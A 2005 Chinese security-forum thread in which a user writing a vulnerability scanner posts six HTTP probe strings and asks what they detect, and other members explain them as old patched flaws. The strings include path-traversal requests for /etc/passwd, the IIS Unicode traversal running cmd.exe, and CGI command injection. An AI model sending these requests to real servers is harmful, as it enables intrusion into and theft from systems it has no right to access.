论坛: 编程破解 标题: 关于HTTP漏洞扫描的问题 复制本贴地址    
作者: tosy [tosy0070]    论坛用户   登录
ex[1]="GET /../../../../etc/passwd HTTP/1.0\n\n";

ex[2]="GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";

ex[3]="GET /A.ida/%c1%00.ida HTTP/1.0\n\n";

ex[4]="GET /cgi-bin/pfdispaly.cgi?/../../../../etc/motd HTTP/1.0\n\n";

ex[5]="GET /cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd HTTP/1.0\n\n";

ex[6]="GET /cgi-bin/test-cgi?* HTTP/1.0\n\n";
本人在做漏洞扫描程序的时候,在资料中看到上面的6组向WEB服务器发送的数据,请问哪位高手能解释下,上面的各组数据具体是检测什么漏洞的,为什么,先谢谢各位的支持了



地主 发表时间: 05-05-23 14:12

回复: 286 [unique]   版主   登录
第一个可能是针对某个具体系统的,应该不是windows系列。
第二个是测IIS中,scripts是否有可执行的权力。
第三个,同第二个。
第四五六是测CGI网关的漏洞。也不是针对windows操作系统的。

真正实用的是第二个和第三个。但这两个要求对方没打补丁,版本很低。并且管理员是弱智。

B1层 发表时间: 05-05-23 15:48

回复: wxngzybb [wxngzybb]   论坛用户   登录
严格的说这些并不是http协议本身的漏洞,unicode漏洞是个系统漏洞
../走到上层目录,当浏览器地址栏禁止用/就用它的unicode码
script目录在iis里是有可执行程序权限的目录,在他的目录下可以寻址并执行程序
win2000 iis 5.0
NT 4.0 iis 4.0打sp1 patch就完结了。也就是说这个漏洞已经没什么价值了

B2层 发表时间: 05-05-23 19:53

回复: NetDemon [netdemon]   ADMIN   登录
这些个漏洞(特别是UNIX的)存在于主流CPU为586的时候,现在呢,基本上是不存在的,
就象你现在除了在20CN,很难找到'286'一样

B3层 发表时间: 05-05-23 21:09

回复: 286 [unique]   版主   登录

说来说去还是嫌我老

B4层 发表时间: 05-05-24 09:02

回复: tosy [tosy0070]   论坛用户   登录
谢谢各位的帮助!请问各位能否提供一些CGI漏洞扫描的资料呢

B5层 发表时间: 05-05-24 14:06

论坛: 编程破解

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号